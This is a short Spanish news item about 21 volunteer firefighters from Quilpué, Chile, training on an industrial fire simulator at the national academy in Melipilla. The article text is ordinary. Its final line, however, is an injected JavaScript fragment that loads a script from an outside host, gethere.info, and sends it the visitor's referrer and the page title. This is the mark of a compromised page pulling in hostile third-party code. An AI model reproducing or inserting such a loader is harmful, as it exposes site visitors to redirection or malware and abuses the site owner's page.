BOMBEROS PARTICIPA EN PRÁCTICA DE FUEGO INDUSTRIAL

El pasado sábado 04 de octubre, en el Centro de Entrenamiento de la Academia Nacional de Bomberos de Chile, ubicado en Melipilla,  21 Voluntarios, de las cinco Compañías del Cuerpo de Bomberos de Quilpué, realizaron actividades prácticas en el Simulador de Fuego Industrial. Actividad que responde al programa de capacitación llevado a cabo por el Departamento de Capacitación.

Los Bomberos participantes, recibieron una nivelación de conceptos claves, relativos al desplazamiento de mangueras, estrategias y tácticas para controlar eficaz y oportunamente, emergencias donde se vean involucradas plantas industriales o procesos industriales. Dicha capacitación, fue dictada por los Instructores de la Academia, quienes cuentan con vasta experiencia en este tipo de escenarios.

Para el Tercer Comandante Sr. Leonardo Araya Vukok quien encabezó la delegación y responsable de la capacitación en la Institución, esta actividad, responde a una necesidad que requiere manejar Bomberos de Quilpué, debido a un pujante crecimiento del Barrio Industrial de la Comuna, y de la cual debemos estar preparados frente a potenciales sucesos relativos a emergencias industriales.

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;